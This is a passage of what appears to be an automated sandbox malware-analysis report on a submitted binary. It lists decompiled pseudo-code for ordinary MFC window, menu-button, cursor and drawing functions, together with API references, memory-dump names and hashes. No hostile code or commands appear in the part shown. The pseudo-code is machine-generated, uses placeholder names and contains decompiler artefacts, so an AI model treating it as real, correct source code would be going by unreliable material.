					_v12.x = 0;
					_v12.y = 0;
					GetCursorPos( &_v12);
					_v12.x =  *((intOrPtr*)(_t70 + 0x15c)) - _v12.x;
					_v12.y =  *((intOrPtr*)(_t70 + 0x160)) - _v12.y;
					_t75 = GetSystemMetrics(0x44);
					if(E00CB277F(0,  *((intOrPtr*)(_t70 + 0x15c)) - _v12.x, _t66, GetCapture()) != _t70 ||  *((intOrPtr*)(_t70 + 0x158)) == 0 || E00DEC8A6(_t66, _v12.x) <= _t75 && E00DEC8A6(_t66, _v12.y) <= _t75) {
						E00D01CAB(_t70, 0xffffffff);
					} else {
						ReleaseCapture();
						 *0xe17a64(_a8, _a12);
						_t63 = _t70;
						if( *((intOrPtr*)( *((intOrPtr*)( *_t70 + 0x164))))() == 0) {
							_t48 = E00CB277F(0, _t63, _t66, GetParent( *(_t70 + 0x20)));
							_t66 = (_a12 & 0x0000ffff) << 0x00000010 | _a8 & 0x0000ffff;
							SendMessageA( *(_t48 + 0x20),  *0xe87ef8, _t70, (_a12 & 0x0000ffff) << 0x00000010 | _a8 & 0x0000ffff);
						}
					}
				}
				return E00CFCF2B(_t70, _t66, _a4, _a8, _a12);
			}

0x00d04d6d
0x00d04d6d
0x00d04d70
0x00d04d71
0x00d04d75
0x00d04d7f
0x00d04d8a
0x00d04d8f
0x00d04d95
0x00d04d9b
0x00d04d9b
0x00d04dab
0x00d04db7
0x00d04dc0
0x00d04dc4
0x00d04dc7
0x00d04de1
0x00d04de4
0x00d04ded
0x00d04dfd
0x00d04e78
0x00d04e21
0x00d04e21
0x00d04e37
0x00d04e3d
0x00d04e43
0x00d04e4f
0x00d04e5f
0x00d04e6c
0x00d04e6c
0x00d04e43
0x00d04dfd
0x00d04e91

APIs

ReleaseCapture.USER32(00000000), ref: 00D04D9B
GetCursorPos.USER32(?), ref: 00D04DC7
GetSystemMetrics.USER32 ref: 00D04DE7
GetCapture.USER32 ref: 00D04DEF
ReleaseCapture.USER32(00000000), ref: 00D04E21
GetParent.USER32(?), ref: 00D04E48
SendMessageA.USER32(?,?,?,00000000), ref: 00D04E6C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Capture$Release$CursorMessageMetricsParentSendSystem
String ID:
API String ID: 237134002-0
Opcode ID: a8d74c8e5fa77dcc160951895260a5d0b4c63cc3db5f7ff887edf80da424d02e
Instruction ID: 986c4600e73467d7ab7e575c095bc86d5de436b825beb0656000c633d611f3ec
Opcode Fuzzy Hash: a8d74c8e5fa77dcc160951895260a5d0b4c63cc3db5f7ff887edf80da424d02e
Instruction Fuzzy Hash: 6D31AEB1600215EFCF05AFA5CC88DADBB76FF44711F14856AF959A22A0CB309D50DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CCCB23 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00CCCB23(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t46;
				void* _t49;
				void* _t52;
				void* _t55;
				intOrPtr* _t81;
				void* _t85;
				void* _t86;

				_t86 = __eflags;
				_t69 = __ebx;
				_push(0x28);
				E00DDD52C(0xe09a67, __ebx, __edi, __esi);
				_t81 = __ecx;
				E00CA67E1(_t85 - 0x10);
				 *((intOrPtr*)(_t85 - 4)) = 0;
				E00CC1628( *((intOrPtr*)(_t85 + 0xc)), _t85 - 0x10,  *((intOrPtr*)(_t85 + 8)));
				_push( *((intOrPtr*)(_t85 - 0x10)));
				E00D0EB00(__ebx, _t85 - 0x2c, _t81, 0, _t86);
				 *((char*)(_t85 - 4)) = 1;
				_push(_t85 - 0x14);
				_push("MFCMenuButton_OSMenu");
				 *((intOrPtr*)(_t85 - 0x14)) = 0;
				_push(_t85 - 0x2c);
				_t46 = E00D1034D(__ebx, _t81, 0, _t86);
				_t87 = _t46;
				if(_t46 != 0) {
					 *((intOrPtr*)(_t81 + 0x7b8)) =  *((intOrPtr*)(_t85 - 0x14));
				}
				 *((intOrPtr*)(_t85 - 0x18)) = 0;
				_push(_t85 - 0x18);
				_push("MFCMenuButton_RightArrow");
				_push(_t85 - 0x2c);
				_t49 = E00D1034D(_t69, _t81, 0, _t87);
				_t88 = _t49;
				if(_t49 != 0) {
					 *((intOrPtr*)(_t81 + 0x7a8)) =  *((intOrPtr*)(_t85 - 0x18));
				}
				 *((intOrPtr*)(_t85 - 0x1c)) = 0;
				_push(_t85 - 0x1c);
				_push("MFCMenuButton_StayPressed");
				_push(_t85 - 0x2c);
				_t52 = E00D1034D(_t69, _t81, 0, _t88);
				_t89 = _t52;
				if(_t52 != 0) {
					 *((intOrPtr*)(_t81 + 0x7b4)) =  *((intOrPtr*)(_t85 - 0x1c));
				}
				 *((intOrPtr*)(_t85 - 0x20)) = 0;
				_push(_t85 - 0x20);
				_push("MFCMenuButton_DefaultClick");
				_push(_t85 - 0x2c);
				_t55 = E00D1034D(_t69, _t81, 0, _t89);
				_t90 = _t55;
				if(_t55 != 0) {
					 *((intOrPtr*)(_t81 + 0x7bc)) =  *((intOrPtr*)(_t85 - 0x20));
				}
				 *((intOrPtr*)(_t85 - 0x24)) = 0;
				_push(_t85 - 0x24);
				_push("MFCMenuButton_Autosize");
				_push(_t85 - 0x2c);
				if(E00D1034D(_t69, _t81, 0, _t90) != 0 &&  *((intOrPtr*)(_t85 - 0x24)) != 0) {
					 *0xe17a64(_t85 - 0x34, 0);
					_t58 =  *((intOrPtr*)( *((intOrPtr*)( *_t81 + 0x170))))();
				}
				E00CA2975(E00D0EB37(_t58, _t85 - 0x2c),  *((intOrPtr*)(_t85 - 0x10)) - 0x10);
				return E00DDD4FA(0);
			}

0x00cccb23
0x00cccb23
0x00cccb23
0x00cccb2a
0x00cccb2f
0x00cccb34
0x00cccb45
0x00cccb48
0x00cccb4d
0x00cccb53
0x00cccb5b
0x00cccb5f
0x00cccb60
0x00cccb68
0x00cccb6b
0x00cccb6c
0x00cccb71
0x00cccb73
0x00cccb78
0x00cccb78
0x00cccb81
0x00cccb84
0x00cccb85
0x00cccb8d
0x00cccb8e
0x00cccb93
0x00cccb95
0x00cccb9a
0x00cccb9a
0x00cccba3
0x00cccba6
0x00cccba7
0x00cccbaf
0x00cccbb0
0x00cccbb5
0x00cccbb7
0x00cccbbc
0x00cccbbc
0x00cccbc5
0x00cccbc8
0x00cccbc9
0x00cccbd1
0x00cccbd2
0x00cccbd7
0x00cccbd9
0x00cccbde
0x00cccbde
0x00cccbe7
0x00cccbea
0x00cccbeb
0x00cccbf3
0x00cccbfb
0x00cccc12
0x00cccc1a
0x00cccc1a
0x00cccc2a
0x00cccc36

APIs

__EH_prolog3.LIBCMT ref: 00CCCB2A

Part of subcall function 00CC1628: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 00CC1641

Part of subcall function 00D0EB00: __EH_prolog3.LIBCMT ref: 00D0EB07

Part of subcall function 00D1034D: __EH_prolog3.LIBCMT ref: 00D10354

Strings

MFCMenuButton_OSMenu, xrefs: 00CCCB60
MFCMenuButton_Autosize, xrefs: 00CCCBEB
MFCMenuButton_StayPressed, xrefs: 00CCCBA7
MFCMenuButton_DefaultClick, xrefs: 00CCCBC9
MFCMenuButton_RightArrow, xrefs: 00CCCB85

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3$ByteCharMultiWide
String ID: MFCMenuButton_Autosize$MFCMenuButton_DefaultClick$MFCMenuButton_OSMenu$MFCMenuButton_RightArrow$MFCMenuButton_StayPressed
API String ID: 2949695960-2044485435
Opcode ID: 06b1687486d5a6653b43ad5378d119cf1a0d4b1354ac1236d513518b29789d30
Instruction ID: 63edbd666ebef14cac78499b076d26ce9fcb8fd87576dbfe00d79cfebca7dfcb
Opcode Fuzzy Hash: 06b1687486d5a6653b43ad5378d119cf1a0d4b1354ac1236d513518b29789d30
Instruction Fuzzy Hash: D731CC71E00219ABCF10EBA5D995AEEBBB9EF08704F104416F829F7251DB749A45CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CAD289 Relevance: 10.6, APIs: 7, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00CAD289(void* __ebx, void* __ecx, short* _a4) {
				intOrPtr _v0;
				int _v8;
				char* _v28;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t10;
				char* _t11;
				int _t12;
				char* _t15;
				char* _t20;
				int _t22;
				void* _t28;
				char* _t30;
				int _t31;
				short* _t35;
				int _t36;

				_t24 = __ecx;
				_push(__ecx);
				_t35 = _a4;
				if(_t35 != 0) {
					__imp__#7(_t35, _t28, __ebx);
					_t22 = _t10;
					_t11 = WideCharToMultiByte(0, 0, _t35, _t22, 0, 0, 0, 0);
					_v8 = _t11;
					__imp__#150(0, _t11);
					_t30 = _t11;
					__eflags = _t30;
					if(__eflags == 0) {
						_t12 = E00CAA501(_t22, _t24, _t30, _t35, __eflags);
						asm("int3");
						__eflags = _v28;
						if(_v28 != 0) {
							__imp__#7(_a4, _t30, _t35);
							_t31 = _t12;
							_t36 = WideCharToMultiByte(0, 0, _a4, _t31, 0, 0, 0, 0);
							_t15 = E00CAAD2A(_v0, _t36);
							__eflags = 0;
							WideCharToMultiByte(0, 0, _a4, _t31, _t15, _t36, 0, 0);
							return E00CA67F5(_v0, _t36);
						}
						return _t12;
					} else {
						__eflags = 0;
						WideCharToMultiByte(0, 0, _t35, _t22, _t30, _v8, 0, 0);
						_t20 = _t30;
						goto L4;
					}
				} else {
					_t20 = 0;
					L4:
					return _t20;
				}
			}

0x00cad289
0x00cad28c
0x00cad28e
0x00cad293
0x00cad29c
0x00cad2a4
0x00cad2ae
0x00cad2b6
0x00cad2b9
0x00cad2bf
0x00cad2c1
0x00cad2c3
0x00cad2e0
0x00cad2e5
0x00cad2e9
0x00cad2ed
0x00cad2f4
0x00cad2fa
0x00cad311
0x00cad314
0x00cad319
0x00cad325
0x00000000
0x00cad335
0x00cad337
0x00cad2c5
0x00cad2c5
0x00cad2d1
0x00cad2d7
0x00000000
0x00cad2da
0x00cad295
0x00cad295
0x00cad2db
0x00cad2dd
0x00cad2dd

APIs

SysStringLen.OLEAUT32(?), ref: 00CAD29C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00CAD2AE
SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 00CAD2B9
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000), ref: 00CAD2D1
SysStringLen.OLEAUT32(?), ref: 00CAD2F4
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00CAD308
WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CAD325

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Byte$CharMultiWide$String$Alloc
String ID:
API String ID: 76326857-0
Opcode ID: 99287140585456cc65239cbd8a852b312a24c395d798ebd289f07770f04e8b9d
Instruction ID: 8c5112443434b2972b2c52eea0ad791ba56d9bcf663b0c17c5e9c0f37f6548df
Opcode Fuzzy Hash: 99287140585456cc65239cbd8a852b312a24c395d798ebd289f07770f04e8b9d
Instruction Fuzzy Hash: 9B1167B6500115BFAB205F669C0CCBB7E7DEFC6BA97008029FD56D2520EA309E04C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 00D40DA4 Relevance: 10.6, APIs: 7, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D40DA4(intOrPtr __ecx, intOrPtr _a4) {
				int _v8;
				intOrPtr _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t27;
				int _t28;
				void* _t44;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t55;

				_t54 = __ecx;
				_t52 = _a4;
				_v16 = __ecx;
				if(_t52 == 0) {
					L4:
					 *((intOrPtr*)(_t54 + 8)) = _t52;
					if(_t52 == 0) {
						LockWindowUpdate(0);
					} else {
						LockWindowUpdate( *( *((intOrPtr*)(_t54 + 0xe4)) + 0x20));
					}
					_t27 =  *((intOrPtr*)(_t54 + 0xcc));
					_v8 = _t27;
					if(_t27 != 0) {
						_t55 = _t54 + 0xc8;
						do {
							_t44 = E00CACA6C(0xe68680,  *((intOrPtr*)(E00CB29D4(_t52, _t55,  &_v8))));
							ValidateRect( *(_t44 + 0x20), 0);
							UpdateWindow( *(_t44 + 0x20));
							if(_t52 == 0) {
								LockWindowUpdate(0);
							} else {
								LockWindowUpdate( *(_t44 + 0x20));
							}
						} while (_v8 != 0);
						_t54 = _v16;
					}
					_t28 =  *(_t54 + 0x24);
					_v8 = _t28;
					if(_t28 != 0) {
						do {
							_t54 =  *((intOrPtr*)(E00CB29D4(_t52, _t54,  &_v8)));
							ValidateRect( *(_t54 + 0x20), 0);
							UpdateWindow( *(_t54 + 0x20));
							if(_t52 == 0) {
								_t28 = LockWindowUpdate(0);
							} else {
								_t28 = LockWindowUpdate( *(_t54 + 0x20));
							}
						} while (_v8 != 0);
					}
				} else {
					_t28 =  *(__ecx + 0x1b8);
					if(_t28 == 0 ||  *((intOrPtr*)(_t28 + 8)) == 0 ||  *((intOrPtr*)(_t28 + 4)) == 0) {
						goto L4;
					}
				}
				return _t28;
			}

0x00d40dab
0x00d40db0
0x00d40db3
0x00d40db8
0x00d40dd2
0x00d40dd2
0x00d40dd7
0x00d40de5
0x00d40dd9
0x00d40de5
0x00d40de5
0x00d40deb
0x00d40df1
0x00d40df7
0x00d40dff
0x00d40e01
0x00d40e1a
0x00d40e21
0x00d40e2a
0x00d40e32
0x00d40e3b
0x00d40e34
0x00d40e3b
0x00d40e3b
0x00d40e41
0x00d40e47
0x00d40e47
0x00d40e4a
0x00d40e4d
0x00d40e52
0x00d40e57
0x00d40e64
0x00d40e69
0x00d40e72
0x00d40e7a
0x00d40e83
0x00d40e7c
0x00d40e83
0x00d40e83
0x00d40e89
0x00d40e57
0x00d40dba
0x00d40dba
0x00d40dc2
0x00000000
0x00000000
0x00d40dc2
0x00d40e93

APIs

LockWindowUpdate.USER32(00000000,00000004,00000004), ref: 00D40DE5
ValidateRect.USER32(?,00000000,?), ref: 00D40E21
UpdateWindow.USER32(?), ref: 00D40E2A
LockWindowUpdate.USER32(00000000), ref: 00D40E3B
ValidateRect.USER32(?,00000000,?), ref: 00D40E69
UpdateWindow.USER32(?), ref: 00D40E72
LockWindowUpdate.USER32(00000000), ref: 00D40E83

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: UpdateWindow$Lock$RectValidate
String ID:
API String ID: 797752328-0
Opcode ID: d5d3d5d87f9cce6c6dfb06b992130c7c4d9f0080b61bc9e7dc87c4eec8dc4e7f
Instruction ID: 551de72690aaa02acd79cc6926b49ea5ad2dc4c6c8d50a9059356ab799537fad
Opcode Fuzzy Hash: d5d3d5d87f9cce6c6dfb06b992130c7c4d9f0080b61bc9e7dc87c4eec8dc4e7f
Instruction Fuzzy Hash: 0D31A032900705EFDB209F64C844BAABBF4FF44B11F19456AFA8AA7260D731ED54DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00D06A8E Relevance: 10.6, APIs: 7, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00D06A8E(int __ecx, intOrPtr _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				intOrPtr _t46;
				int _t52;
				int _t59;
				void* _t61;
				long _t62;
				void* _t63;
				signed int _t66;

				_t32 =  *0xe68dd4; // 0x8d2643c2
				_t33 = _t32 ^ _t66;
				_v8 = _t32 ^ _t66;
				_t52 = __ecx;
				_t62 = 0;
				if( *((intOrPtr*)(__ecx + 0x29c)) != 0) {
					_v40.left = 0;
					_v40.top = 0;
					_v40.right = 0;
					_v40.bottom = 0;
					SetRectEmpty( &_v40);
					 *0xe17a64( &_v40, _t52 + 0x30c, _t63);
					_t59 = _t52;
					 *((intOrPtr*)( *((intOrPtr*)( *_t52 + 0x2fc))))();
					 *((intOrPtr*)(_t52 + 0x29c)) = 0;
					ReleaseCapture();
					if(_a4 == 0) {
						_v24.left = 0;
						_v24.top = 0;
						_v24.right = 0;
						_v24.bottom = 0;
						GetWindowRect( *(_t52 + 0x20),  &_v24);
						_t46 =  *((intOrPtr*)(_t52 + 0x29f8));
						if(_t46 != 1) {
							if(_t46 == 2) {
								_v24.bottom =  *((intOrPtr*)(_t52 + 0x318));
							}
						} else {
							_v24.right =  *((intOrPtr*)(_t52 + 0x314));
						}
						_t62 =  &_v56;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						SendMessageA( *(E00CB277F(_t52, _t59, _t61, GetParent( *(_t52 + 0x20))) + 0x20),  *0xe87eec, _t52,  &_v56);
					}
					SetRectEmpty(_t52 + 0x30c);
					_t33 = SetRectEmpty(_t52 + 0x31c);
					_pop(_t63);
				}
				return E00DDCBCE(_t33, _t52, _v8 ^ _t66, _t61, _t62, _t63);
			}

0x00d06a94
0x00d06a99
0x00d06a9b
0x00d06a9f
0x00d06aa2
0x00d06aaa
0x00d06ab4
0x00d06ab8
0x00d06abb
0x00d06abe
0x00d06ac1
0x00d06adc
0x00d06ae2
0x00d06ae4
0x00d06ae6
0x00d06aec
0x00d06af5
0x00d06afa
0x00d06b01
0x00d06b04
0x00d06b07
0x00d06b0a
0x00d06b10
0x00d06b19
0x00d06b29
0x00d06b31
0x00d06b31
0x00d06b1b
0x00d06b21
0x00d06b21
0x00d06b3a
0x00d06b3d
0x00d06b3e
0x00d06b3f
0x00d06b40
0x00d06b5b
0x00d06b5b
0x00d06b68
0x00d06b75
0x00d06b7b
0x00d06b7b
0x00d06b89

APIs

SetRectEmpty.USER32(?), ref: 00D06AC1
ReleaseCapture.USER32 ref: 00D06AEC
GetWindowRect.USER32 ref: 00D06B0A
GetParent.USER32(?), ref: 00D06B41
SendMessageA.USER32(?,?,?,00000000), ref: 00D06B5B
SetRectEmpty.USER32(?), ref: 00D06B68
SetRectEmpty.USER32(?), ref: 00D06B75

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Empty$CaptureMessageParentReleaseSendWindow
String ID:
API String ID: 2026794321-0
Opcode ID: 113f0d32d642388e2e5bd19babe6bef9ebcb00ac07f55fab4456cbe65ce2ebc5
Instruction ID: c33ee394d6bb879d61f8737986bb4a9b8aa810552d10dd6146ce6681a282e0b2
Opcode Fuzzy Hash: 113f0d32d642388e2e5bd19babe6bef9ebcb00ac07f55fab4456cbe65ce2ebc5
Instruction Fuzzy Hash: 8F31F4B1901209DFCF01DFA5D9888EEBBF9FF48300B1440AAE849AB255DB719A05CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00CECEA4 Relevance: 10.6, APIs: 7, Instructions: 82
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CECEA4(intOrPtr _a4, struct tagRECT _a8, int _a12, int _a16, int _a20, intOrPtr _a24) {
				void* _t34;
				struct HBRUSH__* _t35;
				struct HBRUSH__* _t40;
				int _t64;
				intOrPtr _t67;

				_t67 = _a4;
				_t34 = E00CC19ED();
				if(_a24 == 0) {
					_t35 = _t34 + 0xd0;
					if(_t35 != 0) {
						_t35 =  *(_t35 + 4);
					}
					FillRect( *(_t67 + 4),  &_a8, _t35);
					return  *((intOrPtr*)(E00CC19ED() + 0x68));
				}
				_t40 = _t34 + 0xa0;
				if(_t40 != 0) {
					_t40 =  *(_t40 + 4);
				}
				FillRect( *(_t67 + 4),  &_a8, _t40);
				InflateRect( &_a8, 0xffffffff, 0xffffffff);
				_a16 = _a16 - 1;
				_t64 = _a20 - 1;
				_t45 = _a12;
				_a20 = _t64;
				PatBlt( *(_t67 + 4), _a8.left, _a12 + 1, 1, _t64 - _t45, 0x5a0049);
				PatBlt( *(_t67 + 4), _a8.left, _a12, _a16 - _a8.left, 1, 0x5a0049);
				PatBlt( *(_t67 + 4), _a16, _a12, 1, _a20 - _a12, 0x5a0049);
				PatBlt( *(_t67 + 4), _a8.left + 1, _a20, _a16 - _a8.left, 1, 0x5a0049);
				return  *((intOrPtr*)(E00CC19ED() + 0x40));
			}

0x00cecea8
0x00ceceab
0x00ceceb4
0x00cecf60
0x00cecf65
0x00cecf67
0x00cecf67
0x00cecf72
0x00000000
0x00cecf7d
0x00ceceba
0x00cecebf
0x00cecec1
0x00cecec1
0x00cececd
0x00cecedb
0x00cecee9
0x00ceceec
0x00ceceed
0x00cecef1
0x00cecf01
0x00cecf1a
0x00cecf33
0x00cecf4f
0x00000000

APIs

FillRect.USER32 ref: 00CECECD
InflateRect.USER32(?,000000FF,000000FF), ref: 00CECEDB
PatBlt.GDI32(?,?,?,00000001,?,005A0049), ref: 00CECF01
PatBlt.GDI32(?,?,?,?,00000001,005A0049), ref: 00CECF1A
PatBlt.GDI32(?,00000000,?,00000001,?,005A0049), ref: 00CECF33
PatBlt.GDI32(?,?,?,00000000,00000001,005A0049), ref: 00CECF4F
FillRect.USER32 ref: 00CECF72

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$Fill$Inflate
String ID:
API String ID: 2224923502-0
Opcode ID: 17e0d6aa02b1eef2b9e4382971b92ffcddb152f689adce0035e5608e418f5de5
Instruction ID: 13a1563716c148682c67dfd2c690b72e5ed4c2f950ffdb7ad977991e86950676
Opcode Fuzzy Hash: 17e0d6aa02b1eef2b9e4382971b92ffcddb152f689adce0035e5608e418f5de5
Instruction Fuzzy Hash: 5131E676104209AFDB01DF99DD8AEEA7BB9FF08750F048115FE69961A1C732ED20DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00D7A1B9 Relevance: 10.6, APIs: 7, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00D7A1B9(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				RECT* _t30;
				void* _t34;
				intOrPtr* _t43;
				void* _t44;
				int _t45;
				int _t49;
				intOrPtr* _t60;
				struct tagRECT* _t62;
				void* _t64;
				void* _t65;

				_t65 = __eflags;
				_push(0x58);
				E00DDD55F(0xe11535, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t64 - 0x64)) = __ecx;
				_t60 =  *((intOrPtr*)(_t64 + 0x10));
				 *(_t64 - 0x60) =  *(_t64 + 0xc);
				E00D7A0DE(__ebx, _t64 - 0x50, _t60, __esi, _t65);
				_t49 = 0;
				 *((intOrPtr*)(_t64 - 4)) = 0;
				if(_t60 == 0) {
					_t60 = _t64 - 0x50;
				}
				_t30 =  *(_t64 - 0x60);
				_t62 = _t60 + 0x24;
				 *(_t60 + 0x34) = _t49;
				if(_t30 == 0) {
					 *(_t64 - 0x58) = _t49;
					 *(_t64 - 0x54) = _t49;
					GetCursorPos(_t64 - 0x58);
					SetRect(_t62,  *(_t64 - 0x58),  *(_t64 - 0x54),  *(_t64 - 0x58),  *(_t64 - 0x54));
				} else {
					CopyRect(_t62, _t30);
				}
				_t52 = _t62;
				_t34 = E00CBC589(_t62);
				_t68 = _t34;
				if(_t34 == 0) {
					__eflags = IsRectEmpty(_t62);
					if(__eflags != 0) {
						_t45 =  *0xe887c4; // 0x2
						InflateRect(_t62, _t45, _t45);
					}
				} else {
					 *(_t60 + 0x34) = 1;
				}
				_t63 =  *((intOrPtr*)( *_t60 + 0x58));
				 *0xe17a64(E00CAC659(_t52, _t63, _t68));
				if( *_t63() != 0) {
					_t43 = E00CAD3CC( *((intOrPtr*)(_t64 - 0x64)), 0xe3ef2c);
					_t63 = _t43;
					_t44 = E00CAD3CC(_t60, 0xe3efcc);
					 *(_t64 - 0x5c) = _t49;
					__imp__DoDragDrop(_t43, _t44,  *((intOrPtr*)(_t64 + 8)), _t64 - 0x5c);
					_t49 =  *(_t64 - 0x5c);
				}
				E00CAFEDE(_t64 - 0x50);
				return E00DDD50E(_t49, _t60, _t63);
			}

0x00d7a1b9
0x00d7a1b9
0x00d7a1c0
0x00d7a1c5
0x00d7a1ce
0x00d7a1d1
0x00d7a1d4
0x00d7a1d9
0x00d7a1db
0x00d7a1e0
0x00d7a1e2
0x00d7a1e2
0x00d7a1e5
0x00d7a1e8
0x00d7a1eb
0x00d7a1f0
0x00d7a1ff
0x00d7a203
0x00d7a206
0x00d7a219
0x00d7a1f2
0x00d7a1f4
0x00d7a1f4
0x00d7a21f
0x00d7a221
0x00d7a226
0x00d7a228
0x00d7a23a
0x00d7a23c
0x00d7a23e
0x00d7a246
0x00d7a246
0x00d7a22a
0x00d7a22a
0x00d7a22a
0x00d7a24e
0x00d7a259
0x00d7a265
0x00d7a26f
0x00d7a27b
0x00d7a27d
0x00d7a285
0x00d7a28e
0x00d7a294
0x00d7a294
0x00d7a29a
0x00d7a2a6

APIs

